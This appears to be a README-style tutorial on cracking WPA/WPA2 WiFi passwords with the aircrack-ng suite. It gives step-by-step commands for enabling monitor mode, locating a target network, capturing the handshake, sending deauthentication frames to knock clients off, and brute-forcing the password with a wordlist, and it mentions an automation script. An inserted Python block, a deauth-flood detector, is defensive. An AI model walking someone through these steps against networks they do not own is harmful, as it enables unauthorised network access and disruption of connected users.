cracking WPA/WPA2 secured WiFi networks with the aircrack-ng suite
This guide is for educational purposes only and should not be used for any illegal activities. The author and publisher are not liable for any illegal use.
Monitor mode allows the WiFi adapter to capture all WiFi packets in the air. Before enabling monitor mode, make sure the WiFi adapter is connected to the system. Check this by running iwconfig. The adapter should be listed with a name like wlan0 or wlan1:
wlan0 unassociated ESSID:"" Nickname:"<WIFI@REALTEK>"
Mode:Managed Frequency=2.412 GHz Access Point: Not-Associated
Sensitivity:0/0
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
To enable monitor mode, we first need to stop processes that might interfere with the adapter:
sudo airmon-ng check kill
Next, we can enable monitor mode on the adapter:
sudo airmon-ng start wlan0 # replace wlan0 with the name of your adapter
Look for target network
To find the target network, we can use airodump-ng, which is a tool from the aircrack-ng suite. This tool lists all WiFi networks in the area, including their BSSID, ESSID, channel, etc.:
airodump-ng wlan0 # replace wlan0 with the name of your adapter (your adapter might have a different name after enabling monitor mode, to check run iwconfig)
Write down the BSSID and channel of the target network.
Capture handshake
When a device connects to a WiFi network, a so-called handshake is exchanged between the device and the access point. This handshake can be captured and used to crack the WiFi password. To capture the handshake, we need to run airodump-ng again, but this time we need to specify the BSSID and channel of the target network:
airodump-ng -d AA:AB:AC:AD:AE:AF -c 1 --write handshake wlan0 # replace AA:AB:AC:AD:AE:AF with the BSSID of the target network, 1 with the channel of the target network and wlan0 with the name of your adapter
This command starts listening for the handshake. Once a device connects to the target network, the handshake will be captured and saved to a file called handshake-01.cap. An indicator will show when the handshake is captured; it appears on the first line after the date and time (you can safely stop the process with Ctrl + C once the handshake has been captured).
Optionally, you can speed up the process by deauthenticating all devices currently connected to the target network, forcing them to reconnect and establish a new handshake:
# --deauth specifies the number of deauthentications to send (5 in this case)
aireplay-ng --deauth 5 -a AA:AB:AC:AD:AE:AF wlan0 # replace AA:AB:AC:AD:AE:AF with the BSSID of the target network and wlan0 with the name of your adapter
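A defender-side counterpart to the deauthentication step above: a small sliding-window detector that flags bursts of 802.11 deauthentication frames, which is the signature a wireless IDS looks for, since a client leaving normally produces one or two such frames, not dozens per second. This is an added example and not part of this repository; the frame records, the BSSID and the window/threshold values are constructed for illustration.

```python
from collections import defaultdict, deque
from dataclasses import dataclass

# 802.11 management frame subtypes (frame type 0)
BEACON = 0x8
DEAUTH = 0xC
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class Frame:
    ts: float      # capture time in seconds
    subtype: int   # management frame subtype
    src: str       # transmitter address (a deauth attack spoofs the AP's BSSID here)
    dst: str       # receiver address; the broadcast address hits every client at once


@dataclass(frozen=True)
class Alert:
    ts: float       # time the threshold was crossed
    src: str        # address the deauths claimed to come from
    count: int      # deauths from that source inside the window
    broadcast: bool # whether the triggering frame targeted all clients


def detect_deauth_floods(frames, window=2.0, threshold=10):
    """Return one Alert each time a source sends `threshold` deauths within `window` seconds."""
    recent = defaultdict(deque)  # src -> timestamps of its deauths still inside the window
    alerts = []
    for f in sorted(frames, key=lambda fr: fr.ts):
        if f.subtype != DEAUTH:
            continue
        q = recent[f.src]
        q.append(f.ts)
        while q and f.ts - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) == threshold:             # alert once per crossing, not on every later frame
            alerts.append(Alert(f.ts, f.src, len(q), f.dst == BROADCAST))
    return alerts


# Constructed sample capture: 15 s of beacons, one legitimate client disconnect,
# then 12 deauths in 0.55 s from a hypothetical BSSID to the broadcast address.
AP = "aa:ab:ac:ad:ae:af"
SAMPLE = [Frame(t / 10, BEACON, AP, BROADCAST) for t in range(150)]
SAMPLE.append(Frame(3.0, DEAUTH, "02:11:22:33:44:55", AP))
SAMPLE += [Frame(10 + i / 20, DEAUTH, AP, BROADCAST) for i in range(12)]

if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE):
        print(f"{a.ts:.2f}s deauth flood from {a.src}: {a.count} frames, broadcast={a.broadcast}")
```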
Crack the password
To crack the password, we need to use a wordlist. A wordlist is a list of possible passwords that will be tried one by one until the correct password is found. In this guide, we will use the rockyou.txt wordlist, a popular wordlist that comes pre-installed on Kali Linux. To crack the password, we run aircrack-ng and specify the wordlist and the captured handshake.
And voilà! The password was cracked in only 8 seconds after testing 40629 other passwords. In this case, the password was test1234.
Script automation
Because the process of capturing the handshake is always the same and can be quite tedious, I've automated the process with a simple bash script. It takes two parameters:
(required) the name of the target network
(optional) the name of the adapter - default: wlan0
It does all the steps up to capturing the handshake and drops you directly into the airodump-ng sniff of the target network. You only have to wait for the handshake to be captured and then run the aircrack-ng command to crack the password.